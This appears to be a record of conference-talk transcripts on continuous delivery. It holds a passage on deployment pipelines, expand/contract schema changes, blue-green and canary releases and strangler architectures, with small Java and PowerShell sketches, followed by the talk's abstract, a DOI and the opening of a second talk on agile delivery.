distributed across the US, Brazil, and India. Anytime anyone makes a change, so people check in and it goes to a queue, we automatically run about 45 minutes' worth of tests against that queue. If they fail, you get an email which tells you what went wrong and they actually send you a binary of the build so you can run that on your workstation and reproduce that problem on your workstation. So you automatically get an email which tells you what the problem was and gives you a build so you can press a button and reproduce that problem on your workstation. Any change that passes those tests, they batch them up and run about 45 minutes of tests again against the batched up changes. And if those changes pass that set of tests, then it gets checked automatically into trunk. So unless you pass these two gates, you can't get into trunk. But they were getting 10 to 15 good builds a day out of this process. So every day there'd be enough check-ins. There was about 100 to 150 check-ins every day. About 100,000 lines of code were changing every day. So it's a 10 million line code base, 100,000 lines of code changing every day, 100 to 150 check-ins, and they were getting 10 to 15 good builds a day out of this process, off trunk. Any build that comes out of stage two goes into level two.
Level two is automated acceptance tests, about two hours worth of automated acceptance tests that run against the software running in a virtual machine that simulates being on a printer. If the build passes that, it goes to level three. Level three is a bunch of logic boards. And so the logic boards power on, they download the latest build that comes out of level two, and then automated acceptance tests that run against that build running on physical electronic logic boards to test. And then if you pass that, every night we run regression tests. They had about 30,000 hours worth of regression tests that run in parallel on a massive grid every night, which was level four. And what they did is they were constantly moving the tests between the different stages. So if you have a test that failed down here, we push it up into stage two. Any tests that are passing all the time in stage two, we push them down. So they were constantly moving tests between these stages to make sure they got fast feedback that they found out here that there was a problem, not here. And one of their goals at the program level was to make sure they were getting 95 to 98 percent pass rate out of level two and level three. So most of 95 to 98 percent of the problems were being found up here when it was fast. So it took a lot of investment for them to build this. They had to invest in building the automated tests. They had to invest in building this deployment pipeline. They had to invest in re-architecting the system to support development on trunk and to support being able to run. So anytime something fails in level three, same thing, you get an email with the bug details and a binary that you can deploy on your workstation to reproduce the problem. So they invested a lot of effort into that and they re-architected the system to support the ability to do this. And what they got as a result of that was that they knew within 24 hours whether there was a serious problem. And what that meant was they could introduce new features after code freeze. So they had a code freeze but it was basically irrelevant. You could still change the software and make new changes to the system even after code freeze right up to days before the new release because you knew you were always working off a good foundation. That your software was deployable and they prioritized keeping the software deployable over doing new work. And what that meant was they could go to the business and the business likes one year plans. And they said, okay, we're not going to do that anymore. In return, you can change your mind at any time about the features and we will just change direction right there and then. And that was the trade-off they were able to make which got rid of the time spent doing detail planning. So they didn't do detail planning anymore because the business can change their mind at any time and that's fine. And instead what they were able to do is get rid of a lot of this waste in the process. People think lean is about cutting cost. Lean is not about cutting cost. This is expensive to invest in. What it does is it removes waste and then that leads to cost reduction. And in particular they are able to spend much more time innovating and that drove down the cost of actually building new software. So continuous integration is probably the first thing that you need to be practicing as a way to drive this out. So who's doing continuous integration? Put your hands up. Keep your hands up if you're doing continuous integration. Keep your hands up. 
Put your hands down unless everyone is checking into trunk at least once a day. If you're working on feature branches that live for more than a day, put your hand down. If your build is broken for more than 10 minutes at a time before being fixed, put your hand down. If every check-in does not result in build and tests being run, put your hands down. Okay. So the people in the audience with their hands up are the people who are actually doing continuous integration. Congratulations to you. Continuous integration is not running Jenkins against your feature branches. It's a practice. You can do that practice without any tools at all. James Shore has a paper, Continuous Integration on a Dollar a Day, that talks about doing continuous integration with an old workstation, a rubber chicken and a bell. No CI server. It's a practice. It's a mindset. Keeping the software releasable over doing new work. Always working off trunk. You know, people are always asking, does continuous integration scale? So exhibit A, 400 people distributed across three continents doing 100,000 lines of change every day to a 10 million line code base getting 10 to 15 good builds out of that. You scale this by throwing hardware at it. That's the definition of a scalable process that you can throw hardware at it and solve it. Using feature branches is not a scalable process because the longer the feature branches live and the more people there are on the team, the pain of integrating scales in a nonlinear way as you increase those numbers so it does not scale. Whereas continuous integration does scale. Exhibit B, this is from Google. Google have a continuous integration system that runs, there's 200,000 test suites in the code base. They're running 10 million test suites per day off their CI system in Google. They run about 60 million individual test cases per day. About 4,000 continuous integration builds every day. So continuous integration scales. But what continuous integration requires is that we work in small batches, that we make all changes. Any big change, we break into a series of small changes that keeps the software releasable. And that is the difficult bit. Having developers understand how to break every change into small bits. So if I was going to hypnotize you and slip something into your unconscious, the most important thing I would have you take away from this is the importance of working in small batches. Whether that is, you know, if that's code changes or organizational change or any other kind of change that you're doing, working small batches, that's the thing I want you to take away. Whiskey, beer, working small batches, budgeting, anything you do, find ways to work in small batches, that's the important thing. So I'm going to talk now about patterns for continuous delivery in addition to the kind of the practices that you should be doing. So there's a great quote from this guy. This is Jesse Robbins. He was in charge of availability at Amazon. So all of Amazon's sites, he was the head of availability for all those sites. He's now, he was co-founder of Opscode, which makes Chef. He's also a volunteer firefighter in his spare time, so an enormous overachiever, basically. So this is what he says about web architecture. Success on the web depends on continuous deployment of reliable software to an unreliable platform that scales horizontally. So that is one of the best statements of web architecture that I've ever found, because it covers so many things in such a dense single quote.
So unreliable platform. If you're using Amazon, AWS, any of these different systems, that's an unreliable platform. Do you guys have Netflix in Norway? Yeah, okay. So if you were using Netflix on Christmas Eve last year, you would have noticed that it didn't work. So there was me, Christmas Eve, I have a four-year-old daughter, and she was wanting to watch Disney films on Christmas Eve, and she couldn't because Netflix was down and we have Apple TV and not a proper TV. So that was a problem. I was quite upset about this. And it turns out this was because of a load balancing failure in one of the Amazon zones that caused this problem. Now, people were very quick to blame Amazon about this. This was not Amazon's problem. Amazon were within their SLA. Netflix was not able to meet its SLA. Actually, I'm not sure if that's true because they probably don't even have an SLA because they're sensible. But in as much as they were to have an SLA, if their SLA was higher than the SLA of the infrastructure, that's not Amazon's problem. That's Netflix's problem. So think about the SLA for the software you're building. If that has to be more reliable than the platform that it's built on, that's an architectural problem. You need to think about how to architect your way around that. And that's where the scales horizontally thing comes from. The way you make a, one of the ways you make a resilient system is by making sure that system is resilient to failures of the underlying infrastructure, which means that you should make sure you can move transparently between different availability zones. So Google and Amazon and Etsy and other high performing companies, they actually test this. And they test this by actually bringing data centers down. They do things called game days. There's a great article on game days if you look in ACM where they actually will just, they will say, okay, in six months we're going to run an exercise and they actually just turn off the fiber to a data center. And then they'll ping the person and say, have you, and they'll let them know they're going to do this. They're like, we're going to run a test on your SLA. And then they'll say, okay, we're going to bring down the data center. And they physically switch it off. And they're like, are you within your SLA? And then the site reliability engineer will actually check to see if they're in their SLA. And then they'll bring down a different data center because the SLA says you have to meet, be able to meet your SLA even if there's two data centers down. So then they brought down the European data center and made sure that they were still within their SLA's. So at Google, they test this by actually causing disasters and seeing if the system will actually still meet its SLA's. And obviously they make sure that if it doesn't, they can back out the disaster. They don't actually like burn down data centers. Right? I mean, they just switch off the fiber to make sure that you're okay and then they can switch it back on again if you're not. So that's how you test it by actually causing real problems. And if that makes your compliance people start to freak out, then you know, you've got a problem. But the problem is not with you, it's with your compliance people. So I'm going to talk a bit about the continuous deployment part of this, patterns for continuous deployment. So number one thing is that low risk releases are incremental. So I'm going to present a number of different patterns for making releases low risk and boring. 
Pattern number one is called expand contract. So you have a system, it's probably composed of a bunch of different bits. You know, you have some static content, you have your app, you have a bunch of services it depends on, probably has a database. Who's building a system that doesn't have a database? Okay, maybe one dude, maybe. Okay. Yeah, all right, fair enough. So what we don't want to do is deploy, you know, every time you make a bunch of changes, you have to deploy all of those, what you don't want to do is deploy changes to all the system at once. Instead what you do is you put out the new version of the static content in a different directory before the release. And then what you do is you can roll forward and roll back this without having to change the static content. The same is true of services. If you depend on an upstream service, you don't deploy the new version at the same time you deploy the app, you deploy the new version beforehand and smoke test it and make sure that it works before you deploy the new version of the app that depends on it. This is something that Amazon Web Services does, you know, if AWS releases a new version of EC2, they don't just change the API and sorry you can't use the old API anymore, that would make people very angry. Instead, you provide the API version you want to use as a query string parameter so that as a consumer of the service, you can choose when you want to upgrade. So we do that first again. We can also do that with the database. So Amazon, Facebook, Etsy, these companies are not deploying database schema changes a thousand times an hour. That's not happening. Etsy has database Thursday when they deploy their database schema changes. So what that means is in Facebook, there's one enormous production database and the developers do not get to choose what version of the database is running at the time their software is deployed. They have to defensively code against whatever version of the database happens to be there. And so what that forces you to do is make database changes incrementally using expand contract. So for example, say you're changing your address column to address line one and address line two. What do you do? Do you delete this column and add these new columns at the same time you do the deployment? No. What you do is first of all, you add the two new columns and you keep the old column there. And then what happens is, so you can do this before you deploy the app because this doesn't affect the existing application, right? We've just added some new database objects. That application is going to ignore those. They're set to default null, right? And then you deploy the new version of the application and the new version of the application will try and read from these columns. If they're null or the columns don't exist, then it will read from the old column. But it will always write to the new columns, yeah, the new columns, so and the old ones. So we write to all the columns, but reading, we try and read from the new ones and if we can't, we fall back to the old ones. And in this way, the application will lazily migrate the data. So the new version of the app will lazily migrate the data from here to here. But if we need to roll back the app, we've got the new data there. Rolling back the app doesn't require rolling back the database because the old version of the app can read the new data from the old data structure. And then much later, we can come back and delete the old columns if we want to. 
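A minimal sketch of that write-both, read-with-fallback idea, in plain JDBC-style Java. The table and column names just follow the address example above; they are not anybody's real schema, and the splitting logic is purely illustrative:

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;

// Expand/contract, middle step: the new app version writes both shapes,
// reads the new columns first and falls back to the old single column.
public class CustomerAddressDao {

    private final Connection db;

    public CustomerAddressDao(Connection db) {
        this.db = db;
    }

    public String[] readAddress(long customerId) throws SQLException {
        String line1 = null, line2 = null, legacy = null;
        boolean found = false;
        try (PreparedStatement s = db.prepareStatement(
                "SELECT address, address_line1, address_line2 FROM customer WHERE id = ?")) {
            s.setLong(1, customerId);
            try (ResultSet r = s.executeQuery()) {
                if (r.next()) {
                    found = true;
                    line1 = r.getString("address_line1");
                    line2 = r.getString("address_line2");
                    legacy = r.getString("address");
                }
            }
        }
        if (!found) return null;
        if (line1 != null) {
            // Row already migrated: the new columns win.
            return new String[] { line1, line2 };
        }
        // Not migrated yet: fall back to the old column and lazily migrate it,
        // so the next read finds the new columns populated.
        String[] split = splitLegacyAddress(legacy);
        writeAddress(customerId, split[0], split[1]);
        return split;
    }

    public void writeAddress(long customerId, String line1, String line2) throws SQLException {
        // Write both the old and the new columns so either app version can read the row,
        // which is what makes rolling the app back safe without rolling back the schema.
        try (PreparedStatement s = db.prepareStatement(
                "UPDATE customer SET address = ?, address_line1 = ?, address_line2 = ? WHERE id = ?")) {
            s.setString(1, (line1 + " " + (line2 == null ? "" : line2)).trim());
            s.setString(2, line1);
            s.setString(3, line2);
            s.setLong(4, customerId);
            s.executeUpdate();
        }
    }

    private String[] splitLegacyAddress(String legacy) {
        if (legacy == null) return new String[] { null, null };
        int cut = legacy.indexOf(',');
        return cut < 0
                ? new String[] { legacy, null }
                : new String[] { legacy.substring(0, cut).trim(), legacy.substring(cut + 1).trim() };
    }
}
```

The expand step, adding the nullable address_line1 and address_line2 columns, ships before this code; the contract step that drops the old address column only ships once no deployed version of the app still reads or writes it.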
So that's the essence of Expand Contract. We expand, we add new stuff first, new database schema changes, new services, new static content. Then we deploy the new version of the app and then we come back and contract to remove the old stuff later. And again, that's expensive. You have to invest in that. What you're doing is you're adding complexity to your software in order to reduce the risk of deployments. It's a trade-off. It's not a silver bullet, it's a trade-off. And there's a fabulous book called Release It by Michael Nygard which covers this pattern and a bunch of other patterns for creating resilient systems. It's a great book. So how about making changes to the application in an incremental way? How do we deploy the application in an incremental way? Well, we use a pattern called blue-green deployments. So what this means is, real story, I was working on a system in 2005 where we could only get one production set of hardware. We were not going to get another set of hardware because it was too expensive. And so we didn't have a staging environment. That was scary. So what we did is we created what we called a green environment, which was a new instance of Apache and WebLogic and a new green database, which sat on the same boxes, but they were installed on a different place in the file system and they listened on different ports. So what we did is we deployed the new version to our green environment. And then that's deployment. Release is just changing the router to point to the green environment ports. Rollback is changing the router back to point at the blue environment ports. So in this way, we were able to do deployment and the deployment took about an hour, but we were able to do roll forward and roll back in less than a second, super safely, by using this technique of separating out deployment and having two environments. And then when we deployed version 1.3, that would go into the blue environment and 1.4 would go into the green environment. So we did this by having multiple things on the same box. You can also do this in several other different ways. By virtualization, if you have two data centers, a main data center and a backup data center, your main data center is blue, your backup data center is green. So you've got your current version running in your main data center, you deploy the next version to your backup data center. And then release is switching DNS to point to the new data center or your load balancer. And then your backup data center becomes your main data center. Your main data center is now your backup data center and you've tested your business continuity process for free at the same time. And this brings us to a really important principle. Release and deployment are two different things. Deployment is taking a build and putting it into an environment. Release is making a feature available to users. And we normally achieve release through deployment. But they're actually two completely different things. Facebook's release manager, Chuck Rossi, has a video where he says all major features in Facebook are already in production. All the features they're going to release in the next six months are already in production. You just can't see them yet. So they're deploying this stuff constantly into production, but it's not user-visible. They have a piece of software called Gatekeeper that controls which users can see which features.
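Gatekeeper itself isn't public, but a minimal sketch of that kind of gate, per feature and per user and changeable at runtime without a deployment, might look something like this. All the names here are illustrative, and it's the same basic idea as the per-device switches in the HP firmware story:

```java
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;

// A deliberately tiny feature gate: the code for a feature is deployed,
// but only users the gate lets through actually see it.
public class FeatureGate {

    private static class Rule {
        final int percentage;            // 0..100 gradual rollout
        final Set<String> allowedUsers;  // explicit allow list, e.g. employees first

        Rule(int percentage, Set<String> allowedUsers) {
            this.percentage = percentage;
            this.allowedUsers = allowedUsers;
        }
    }

    private final Map<String, Rule> rules = new ConcurrentHashMap<>();

    // Called by whatever admin UI or config push drives rollout;
    // changing a rule is a release, not a deployment.
    public void configure(String feature, int percentage, Set<String> allowedUsers) {
        rules.put(feature, new Rule(percentage, allowedUsers));
    }

    public boolean isEnabled(String feature, String userId) {
        Rule rule = rules.get(feature);
        if (rule == null) return false;                       // unknown features stay dark
        if (rule.allowedUsers.contains(userId)) return true;  // drink-your-own-champagne users
        // Deterministic bucketing so the same user always gets the same answer.
        int bucket = Math.floorMod((feature + ":" + userId).hashCode(), 100);
        return bucket < rule.percentage;
    }
}
```

Call sites then just ask gate.isEnabled("timeline-redesign", userId) and fall back to the old behaviour when it returns false, so turning the knob from employees only, to 1%, to 100% never touches the deployed binary.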
And they can change that dynamically, which lets them roll a small feature experiment out, test it with a small set of their users, get feedback, iterate, and then when they're happy, then they roll it out to a larger and larger group of users. But we should be deploying all the time. Release is when we turn that knob up to 100. And that should be a boring, low-risk activity that the business can perform without even talking to IT. And it's low-risk because that software has already been in production for months. And we know that it works. And we've done all the testing on it in production before we actually release it to all the users. Another technique for reducing the risk of release is called canary releasing. And again, this is something that many large, high-performing organizations do. Facebook in particular, they have a cluster called A1, which is a few thousand boxes. New releases go out to that first. Facebook employees, when they go to facebook.com, they don't actually go to facebook.com, which is this big cluster. They're automatically re-rooted to this cluster, which is called inyour.facebook.com. So Facebook employees go to this. And so basically what they do, I mean, people call this dog-fooding, which is weird because who wants to eat dog food? So they call it drinking your own champagne. So they drink their own champagne. They test it here before it goes out here. And then if the build is good here, then it goes here, which is maybe a data center. And a very small set of users get sent to that. And then if it's good, then they send it out to the rest of the world. And so it's like a canary in a coal mine. In the old days, people used to take a canary into the coal mine. And the canary, if there was dangerous gas in the coal mine, the canary would die. And then everyone would run really fast out of the coal mine. And these days, they have chemical detectors, which means that no birds are killed, which is good. So no animals were harmed in the course of this presentation. So this is the canary. We make sure the software works here. And we're monitoring business metrics. We're not monitoring like CPU or disk space or IO. We're measuring how many users are actually sending messages through Facebook chat. How many people are actually posting onto their timeline measuring actual user activities? So if you're doing green field development, you can design with these patterns upfront. You can design for testability. You can architect for deployability. What happens, who here has an existing system that is definitely not designed for continuous delivery, but they want to get from A to B? Okay, many of you. So that's why I just want to spend 10 minutes on re-architecting. So I want to talk briefly about Amazon. Amazon in 2001 had a big ball of mud in production, a big monolithic app called Obidos. And in 2001, Jeff Bezos, the CEO of Amazon, sent a memo to his entire technical staff saying, we are going to re-architect around a service-oriented architecture. And this is before anyone was even talking about service-oriented architecture. And we're going to have a team for each service. So they invented this term, two pizza teams. So no team can be bigger than you can feed with two pizzas. Now, this is Seattle, so the pizzas are quite big. But still, that's about 10 to 12 people per team. So they re-architected the system so that every, they broke it into services. The service was maintained through its entire life by a team of people who was responsible for that particular service. 
And the rule is, you're not allowed to talk to another service's database. You have to talk to other services through their service layer, through their API. And they hired a US Army Ranger. And the job of the US Army Ranger was to go around the different teams, and if he saw someone talking to another service through the database, he would shout at them a lot. And if they carried on doing that, the rumor has it that you would get fired. So I'm not recommending people get fired, but rumor has it that it's, you know, a very serious offense not to actually go through the service layer when you're talking to other services. And so over the course of a few years, they did this. And so this is Werner Vogels, the CTO of Amazon. I'm going to put words into his mouth. I love doing this. So this is in 2006, 2007, I think. If you hit Amazon.com, the app calls more than 100 services to render the front page. Now, that causes, I mean, that is non-trivial, and it causes other problems, like trying to, if something goes wrong with that, how do you debug that when you've got 100 services collaborating to produce that problem? Well, you need to do really good monitoring of the way calls go through that graph of services. You need to do lots of caching to make that actually performant. But again, it scales. It's a horizontally scalable architecture that doesn't have a single point of failure. The reason they had to do this was because they kept scaling their single big database bigger and bigger until finally the UI couldn't handle it. So they had to re-architect to create a reliable service based on an unreliable platform that scaled horizontally. And that's the upshot of this. But, you know, how do we do this? I mean, and they did this in a somewhat incremental way. So there's still parts of Obidos that are live today, I'm told. I don't know if that's true. It's really hard to find out what's really going on at Amazon because they don't like to talk about it. So how do we do this incrementally? Well, there's a pattern called strangler applications. So if you've seen Tomb Raider, the film, okay, many of you. So lessons from Tomb Raider. If you've seen Tomb Raider, you would have seen this temple in Cambodia where there's this tree that's grown on top of the temple. And what's grown on top of the tree is a kind of fig called a strangler fig. And the seeds are on the tree and the fig grows down and the fig grows up around the tree. And eventually the fig will strangle the tree. And all that's left is the fig vine that's grown up around it. So this is a metaphor for what you should be doing with architecture. I'm very happy that I was able to draw architectural lessons from Tomb Raider. Super. So customers, big ball of mud, big fat database. What we do is when new requirements come in, what we do is we find ways to implement those new requirements using a new module. So maybe this module serves just one particular web page as part of your whole site. And the stuff that needs to do that is in its own database. But everything else gets delegated through to the original app. So we delegate most of the stuff here and just this new page or even a new part of a page. So for example, Amazon, the recommendations engine is a service. And so the part of the page that shows recommendations is done by this service. And maybe you have a new requirement for your website, we need recommendations. So you don't implement that in the existing system.
You implement that as a new service. And maybe what we do is we have an include statement that pulls from this particular service to render that part of the page. But all new functionality, all new requirements you implement using new modules, new services that you build. And gradually over time, what you end up with is a bunch of new services. And eventually, finally, this thing gets strangled. We strangle the original application. So this is how we incrementally move from big monolithic ball of mud that's not suitable for continuous delivery to a new architecture that's service oriented that is designed for continuous delivery. And again, this happens incrementally over time. The problem is, you know, our organizations aren't set up to do this. There's an annual budgeting cycle. We start a huge new project. Who's experienced the enormous rebuilds? You know, the big bang re-system re-architecture. We're going to re-architect everything from scratch. So hands up if that's actually worked for you. Yeah, I thought so. So yeah, someone who has worked for it, it does sometimes work. When that happens, I'm like, wow, you guys are really amazing. Or you have great senior management politicians to make it look like it worked even though it didn't. But starting a new project that's going to take a long time to make sure that it's definitely going to work this time. So it does sometimes work. It's very, very, very risky. And so what I saw, I mean, people object to this because they say, this is going to take too long. But my reply to this is it's better for the journey to take a long time and to arrive at the destination than for the journey to take a shorter amount of time but you never actually get there. So I want to talk about how we do this in the small. So this is big scale architectural change. How do we make smaller scale architectural changes, particularly on trunk? How do you change a particular module or service on trunk and make architectural changes? Well, this is a pattern called branch by abstraction. And what you do is this. We employ, there's a joke in computer science. There's no problem you can't solve with an additional layer of abstraction. So, or indirection. So what we do is we have a library we want to change or a component we want to change. What we do is we put an abstraction layer above it and make everything go through that. And then we incrementally move methods or API calls from one implementation to another one. So I used to work on a product called Go for release management. We changed the back end from iBATIS to Hibernate and we changed the front end from Velocity to JRuby on Rails and we carried on releasing the software during those two rearchitectures. So I just want to make sure I don't run out of time. I'm going to talk briefly about the front end. The abstraction layer was the servlet API. We basically said if the URI had slash new, it would go through to JRuby on Rails. Otherwise it went through to the old Velocity stack. Any new requirement that came in that added a new page or changed an existing page, we copied that page over to JRuby on Rails. And then we did just that one page. And then what happened was when that page was ready, we changed the rest of the app to point to the slash new version here. But the rest of the app was still using Velocity. So there's no way as a user for you to tell if you are going through the Velocity stack or the JRuby on Rails stack unless you looked at the URI. 
Same CSS, same HTML, but which stack it was being rendered through, you had no way of telling unless you looked at the URI to see which route it was going through. And so there's still some pages in Velocity right now. It's just that, so you can keep the old stuff for as long as you want. If you're a bit anal, you know, a bit OCD, then maybe you want to get rid of the old implementation eventually. And, you know, if you're really OCD, you might want to get rid of the interface as well. But it turns out you don't really need to do that. And again, as a trade-off, you're adding complexity in order to manage the ability to, this architectural cross-functional requirement of deployability. The final point I want to make is that continuous delivery, it's not about changing your architecture to do CD. Doing CD exerts a force on your architecture. Architecture is easy to change when you're starting work. When you're a long way into your work, it's hard to change. By continuously deploying throughout, you're constantly validating your architecture. By constantly doing performance testing, by constantly deploying, by constantly doing acceptance testing, what you're doing is creating a force on your architecture to make it testable, to make it deployable, and to make sure that we're actually meeting our cross-functional requirements so that we can find if there's a problem with our architecture early when it's cheap to fix, not late when it's expensive and painful to fix. So, Dan North has a pattern called Dancing Skeleton, which is based on Alistair Cockburn's walking skeleton. And the idea is with a dancing skeleton, you know, you get a few features in production and test them with a realistic load and data set. And you actually have an API and make sure you can really exercise that. And that's why it's dancing, because you're really using it. And again, as I talked about, you're testing things like availability, security, disaster recovery, business continuity planning by having game days, actually creating real disasters to make sure that your software meets its cross-functional requirements. So the final take-aways, testability and deployability are architectural constraints. You need to architect with these things in mind. We want to be able to develop functionality on trunk so we can get fast feedback on whether what we're doing really actually works and whether the work we're doing actually meets our SLAs with the architecture we're using. You need to design for continuous deployment and incremental deployment. You can do rearchitecture and redesign in an incremental way as well. And the way to make sure that you're actually going to, your architecture is actually going to work and meet your cross-functional constraints is by doing continuous delivery, by actually practicing that thing all the time. That's how you verify it's really going to work. So we have four minutes for questions. What questions do you have? Yes? At the beginning you mentioned that you would be able to run your integration test on your development machine. How do you manage that when you have to be like Android on? Right. So any serious system, there's going to be like a bunch of different things and there's going to be the platform as a service, infrastructure it runs on, these other things. What you basically need to do is create mocks of those other services. So you should be able to mock out that service and you don't necessarily need to do it for every service because that becomes hard to maintain. 
But you find the big boundaries. So maybe you can stand up two of these services in your development machine at once and you just stand those things up. But then there's some other, so you group the services up and then stand up a group of them and then look at the other things and you create an abstraction layer between those things which is just good API design in any case and you create mocks of those things. And what you can do, there's a technique that you can use where you basically create a proxy and you stand up the whole system and record the messages and then you just store those and then you can stand up part of the system and you just use the recording of the messages, the canned responses in order to be able to mock out the other systems. I mean, that's how you solve it if you have an existing system that you need to redesign. I mean, the other way you do it is just by making sure that you design the system so you can find 80% of the bugs without even having to talk to the other systems at all. So you just abstract that away. So if the other systems aren't there, my service will still work but with a degraded quality of service. So using patterns, Michael Nygard has a pattern called circuit breaker which basically means if I can't contact the remote service, I will break the circuit for a certain period of time and my service will still carry on working but without that extra stuff that the external service brings you. So that's just good design is that I should be able to operate my service even if the other ones aren't there and so I should be able to do most of my testing with that being the case. And then for the small part of your functionality where that's not true, then we use mocks. Does that answer your question? Yes. So that's an excellent question. There's always some sharp person who spots that in the database part of blue-green deployments. The question is, you know, if I do this, if I roll forward to version 1.2 and I need to roll back, there's new stuff in this database, right? What do I do about that? Well, the first thing you do is, I mean, maybe you don't care about that. You need to start with what's my recovery point objective? What's my recovery time objective? What are my actual SLAs around this? Maybe it's okay for me to lose the data. If that's true, that's super because you can just, I mean, literally what you do is before you deploy, you back up the 1.1 database and you restore to the green 1.2 and you switch over. Then anything that happens between that and roll back, you just lose. That may be fine. If it's not, you can do things like putting the app into read-only mode for a certain period of time. If that's not acceptable, then you're going to have to use expand contract. So expand contract the whole point.
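Going back to the circuit-breaker pattern mentioned in that earlier answer, here is a minimal sketch of the idea in PowerShell. It is illustrative only: the recommendations URL, the failure threshold, and the fallback are all made up, and a real implementation along the lines Michael Nygard describes would also need per-dependency state and a half-open retry step.

# Minimal circuit-breaker sketch; names and thresholds are invented for illustration.
$script:FailureCount     = 0
$script:CircuitOpenUntil = [DateTime]::MinValue
$FailureThreshold = 3          # consecutive failures before the circuit opens
$CooldownSeconds  = 30         # how long to stay open before trying again

function Invoke-WithCircuitBreaker {
    param(
        [scriptblock]$Call,      # the call to the remote service
        [scriptblock]$Fallback   # degraded behaviour while the circuit is open
    )

    if ([DateTime]::UtcNow -lt $script:CircuitOpenUntil) {
        # Circuit is open: skip the remote call entirely and degrade gracefully.
        return & $Fallback
    }

    try {
        $result = & $Call
        $script:FailureCount = 0   # a success closes the circuit again
        return $result
    }
    catch {
        $script:FailureCount++
        if ($script:FailureCount -ge $FailureThreshold) {
            $script:CircuitOpenUntil = [DateTime]::UtcNow.AddSeconds($CooldownSeconds)
        }
        return & $Fallback
    }
}

# Recommendations are nice to have, so the fallback is simply an empty list.
$recommendations = Invoke-WithCircuitBreaker `
    -Call     { Invoke-RestMethod 'https://recommendations.example.com/api/top' } `
    -Fallback { @() }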
|
Continuous delivery can be considered a cross-functional requirement, rather like testability and maintainability. In the first part of this talk I'll explore the implications of continuous delivery for your systems architecture. The second part will present patterns that successful organizations have used to enable continuous delivery. In the final part, I'll discuss the architectural and organizational obstacles presented by typical legacy "big ball of mud" systems, and what can be done to incrementally move away from them.
|
10.5446/51435 (DOI)
|
So, let's see here. To get started today, here's the things we're going to cover. What is continuous delivery? Why is it important? How can you do it wrong and how can you do it right? But before we start with that, let me tell you a little bit about myself. I have been delivering software for about seven years now and I've been doing it perfectly ever since I started. No, that's not true at all. I've been delivering software well for maybe 18 months and today I'd like to share with you some lessons I've learned on the way to get to doing it well out of a lot of failure from the past. So for starters, how many people here are practicing agile in your shop today? Okay, pretty much all of you. And how many people are practicing continuous delivery? Much smaller portion. Okay, that's what I see when I talk to people a lot and what I want to tell you about today is why is continuous delivery one of the most important parts of agile? So let's start with what is continuous delivery? This is my definition of continuous delivery: delivering working, tested software to your users as frequently as is practical. Notice I didn't say possible, I said practical because while it may be possible for you to deliver software every single time you commit, that may not be practical for your users. Why is continuous delivery an important part of agile? If we look at a couple of quotes of some of the principles that were defined by the original team who defined the agile manifesto, you can see that they had continuous delivery in mind. That they saw that just because you're developing quickly with a short feedback cycle doesn't mean that you can just sit on your software for six months before you deliver it to your users. One of the main tenets of agile is to deliver business value to your users and you can't do that if you're on a nine month delivery cycle without your end user seeing your software. So frankly if you are delivering software, if you're developing in nice short agile two week or four week sprints but you're only delivering every quarter or twice a year, you're kind of trolling your users. That's this guy. He develops in two-week sprints but he delivers to production quarterly. So what does that mean? Why is that trolling your users? Let's say a user finds a bug in production. You say great, we're going to get that fixed in the very next sprint. So you go out and you write the code and you fix that bug. Awesome. Hey, we're going to put it in the bug tracking system. It's fixed and the user sees that and says great, my problem is going to be solved now. Awesome. When am I going to see that? And you say oh, in about six months when we do the next production release. Sorry. That's exactly why Continuous Delivery is one of the most important tenets of agile. You've got to deliver that business value and if your code is not being shipped to an environment where your user can actually make use of it, they're not really gaining value from it. Let me pull up. So today we're going to look at, one other point I wanted to make before we move on, let's go back, is let me tell you how agile worked in an organization I was at before. We started practicing agile development in two-week sprints and so we would, you know, there was this nice big front loaded process where they would go out and do a big huge requirements gathering session over a month or so and build out a big nice requirements document. 
And then we as the dev team said oh, well we're agile so we're going to take that requirements document and we're going to decompose it into a backlog of user stories and we're going to iterate on it every two weeks. And then at the end of this three or six month project of us iterating every two weeks, we're going to go ahead and ship that software to you. That wasn't really agile. That's what I like to call the scrummerfall. You know, you're practicing a version of scrum inside of the waterfall and you haven't really implemented agile at that point. Agile is one of those things that you've really got to have buy-in from your entire business unit that they understand what you're doing and why you're doing it and that it is different from what they've done before and that can be a hard sell. But in my experience, getting them through to the continuous delivery piece really kind of helps sell it because all of a sudden they start to say oh, I'm going to have so much visibility into what you're doing by seeing the code you write every two weeks. That's awesome or every month if that's how you do your sprints. That's great and they're going to get to give feedback and once you get through those first couple of cycles, they're going to see the value in doing this type of iterative development and continuous delivery is the part that makes that possible. So today we're going to look at an app that has some complexity and the reason we're going to look at that is because I've been to some talks on continuous delivery before and I've seen somebody get up here on stage and go all right, cool, here we go, file new MVC app and here's how you can deploy it quickly. And I was like that's awesome. I got done with the conference and I went back to my job and I opened up my Visual Studio solution which had 69 projects in it including some seven deployable web apps, a couple of Windows services, three or four one off console apps that have to run as a scheduled task, production database, a reporting database schema and I went oh, well they didn't show me how to deal with all of this. It was just one thing. It looked real simple. Now all of a sudden I've got this complex real world application that I've got to deploy and I don't know how to make that happen. So part of what I want to show you today is a set of tools that I found that helped me deliver complex real world applications. So this is an application that is not truly complex. It's complex for the sake of complexity just so we can demonstrate it. But it's going to consist of a front end web app that's kind of a catalog style app for buying phones or something like that. An API that drives the front end so the front end grabs all of its data from a back end API. That's another deployable piece. Maybe on a whole separate tier. There's going to be obviously maybe a service bus for some messaging back and forth. Definitely going to be a database in there. Some scheduled tasks, a Windows service that handles sending some emails and such. None of these apps actually work. Just FYI, I didn't go so far as to build a hugely complex app just for the heck of it. But I did build the shell of these apps to represent something similar to what I was seeing in real world applications. So we'll want to look today at a couple of tools that I've used to automate my process and get deployment going. But first I want to take you through some of the stumbling blocks that I went through in trying to get to a state of deployment in Nirvana. 
